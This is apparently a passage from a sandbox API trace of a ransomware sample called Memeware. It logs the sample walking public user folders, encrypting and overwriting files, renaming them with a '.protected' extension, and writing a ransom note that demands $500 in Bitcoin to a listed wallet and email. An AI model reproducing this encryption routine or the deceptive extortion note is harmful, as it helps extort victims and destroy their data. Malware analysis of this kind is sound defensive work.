dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.476] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini") returned 41 [0095.476] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0095.476] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini") returned 41 [0095.476] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0095.476] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini") returned 41 [0095.476] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0095.476] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x116, lpOverlapped=0x0) returned 1 [0095.476] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffeea, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.476] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x116, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x116, lpOverlapped=0x0) returned 1 [0095.476] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.476] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.477] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.477] CloseHandle (hObject=0xb4) returned 1 [0095.477] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini.protected") returned 51 [0095.477] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini" (normalized: "c:\\users\\public\\documents\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini.protected" (normalized: "c:\\users\\public\\documents\\desktop.ini.protected")) returned 1 [0095.478] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.478] lstrcmpiW (lpString1="My Music", lpString2="Windows") returned -1 [0095.478] lstrcmpiW (lpString1="My Music", lpString2="Program Files") returned -1 [0095.478] lstrcmpiW (lpString1="My Music", lpString2="Program Files (x86)") returned -1 [0095.478] lstrcmpiW (lpString1="My Music", lpString2="$Recycle.bin") returned 1 [0095.478] lstrcmpiW (lpString1="My Music", lpString2="System Volume Information") returned -1 [0095.478] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\My Music") returned 38 [0095.478] lstrcmpW (lpString1="My Music", lpString2=".") returned 1 [0095.478] lstrcmpW (lpString1="My Music", lpString2="..") returned 1 [0095.478] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\My Music\\*") returned 40 [0095.478] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\My Music\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0xffffffff [0095.478] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.478] lstrcmpiW (lpString1="My Pictures", lpString2="Windows") returned -1 [0095.478] lstrcmpiW (lpString1="My Pictures", lpString2="Program Files") returned -1 [0095.478] lstrcmpiW (lpString1="My Pictures", lpString2="Program Files (x86)") returned -1 [0095.478] lstrcmpiW (lpString1="My Pictures", lpString2="$Recycle.bin") returned 1 [0095.478] lstrcmpiW (lpString1="My Pictures", lpString2="System Volume Information") returned -1 [0095.478] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures") returned 41 [0095.478] lstrcmpW (lpString1="My Pictures", lpString2=".") returned 1 [0095.478] lstrcmpW (lpString1="My Pictures", lpString2="..") returned 1 [0095.478] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures\\*") returned 43 [0095.478] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0xffffffff [0095.478] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.478] lstrcmpiW (lpString1="My Videos", lpString2="Windows") returned -1 [0095.478] lstrcmpiW (lpString1="My Videos", lpString2="Program Files") returned -1 [0095.478] lstrcmpiW (lpString1="My Videos", lpString2="Program Files (x86)") returned -1 [0095.478] lstrcmpiW (lpString1="My Videos", lpString2="$Recycle.bin") returned 1 [0095.478] lstrcmpiW (lpString1="My Videos", lpString2="System Volume Information") returned -1 [0095.478] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\My Videos") returned 39 [0095.478] lstrcmpW (lpString1="My Videos", lpString2=".") returned 1 [0095.478] lstrcmpW (lpString1="My Videos", lpString2="..") returned 1 [0095.478] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\My Videos\\*") returned 41 [0095.478] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\My Videos\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0xffffffff [0095.479] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0095.479] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0095.479] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\RESTORE_FILES.txt") returned 47 [0095.479] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\RESTORE_FILES.txt" (normalized: "c:\\users\\public\\documents\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.479] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.479] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0095.480] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0095.480] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0095.480] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.480] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0095.480] CloseHandle (hObject=0xa4) returned 1 [0095.480] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.480] lstrcmpiW (lpString1="Downloads", lpString2="Windows") returned -1 [0095.480] lstrcmpiW (lpString1="Downloads", lpString2="Program Files") returned -1 [0095.480] lstrcmpiW (lpString1="Downloads", lpString2="Program Files (x86)") returned -1 [0095.480] lstrcmpiW (lpString1="Downloads", lpString2="$Recycle.bin") returned 1 [0095.480] lstrcmpiW (lpString1="Downloads", lpString2="System Volume Information") returned -1 [0095.480] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Downloads") returned 29 [0095.480] lstrcmpW (lpString1="Downloads", lpString2=".") returned 1 [0095.480] lstrcmpW (lpString1="Downloads", lpString2="..") returned 1 [0095.480] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Downloads\\*") returned 31 [0095.480] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Downloads\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0095.481] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.481] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.481] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.481] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.481] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.481] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Downloads\\.") returned 31 [0095.481] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.481] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.481] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.481] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.481] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.481] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Downloads\\." (normalized: "c:\\users\\public\\downloads\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.481] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.481] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.481] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.481] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.481] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.481] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.481] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Downloads\\..") returned 32 [0095.481] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.481] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.481] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.481] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.481] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.481] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.481] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Downloads\\.." (normalized: "c:\\users\\public"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.481] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.481] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0095.481] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0095.481] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0095.481] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0095.481] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0095.481] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini") returned 41 [0095.482] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0095.482] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0095.482] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.482] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.482] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini" (normalized: "c:\\users\\public\\downloads\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.482] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini") returned 41 [0095.482] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0095.482] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini") returned 41 [0095.482] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0095.482] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini") returned 41 [0095.482] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0095.482] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0xae, lpOverlapped=0x0) returned 1 [0095.483] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffff52, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.483] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0xae, lpOverlapped=0x0) returned 1 [0095.483] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.483] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.483] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.483] CloseHandle (hObject=0xb4) returned 1 [0095.484] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini.protected") returned 51 [0095.484] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini" (normalized: "c:\\users\\public\\downloads\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini.protected" (normalized: "c:\\users\\public\\downloads\\desktop.ini.protected")) returned 1 [0095.484] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0095.484] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0095.484] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Downloads\\RESTORE_FILES.txt") returned 47 [0095.484] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Downloads\\RESTORE_FILES.txt" (normalized: "c:\\users\\public\\downloads\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.485] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.485] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0095.486] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0095.486] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0095.486] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.486] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0095.486] CloseHandle (hObject=0xa4) returned 1 [0095.486] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.486] lstrcmpiW (lpString1="Favorites", lpString2="Windows") returned -1 [0095.486] lstrcmpiW (lpString1="Favorites", lpString2="Program Files") returned -1 [0095.486] lstrcmpiW (lpString1="Favorites", lpString2="Program Files (x86)") returned -1 [0095.486] lstrcmpiW (lpString1="Favorites", lpString2="$Recycle.bin") returned 1 [0095.486] lstrcmpiW (lpString1="Favorites", lpString2="System Volume Information") returned -1 [0095.486] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Favorites") returned 29 [0095.486] lstrcmpW (lpString1="Favorites", lpString2=".") returned 1 [0095.486] lstrcmpW (lpString1="Favorites", lpString2="..") returned 1 [0095.486] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Favorites\\*") returned 31 [0095.486] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Favorites\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0095.486] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.486] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.486] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.486] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.486] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.486] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Favorites\\.") returned 31 [0095.486] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.486] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.486] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.486] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.486] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.487] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Favorites\\." (normalized: "c:\\users\\public\\favorites\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.487] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.487] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.487] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.487] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.487] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.487] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.487] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Favorites\\..") returned 32 [0095.487] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.487] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.487] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.487] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.487] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.487] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.487] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Favorites\\.." (normalized: "c:\\users\\public"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.487] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0095.487] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0095.487] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Favorites\\RESTORE_FILES.txt") returned 47 [0095.487] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Favorites\\RESTORE_FILES.txt" (normalized: "c:\\users\\public\\favorites\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.487] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third 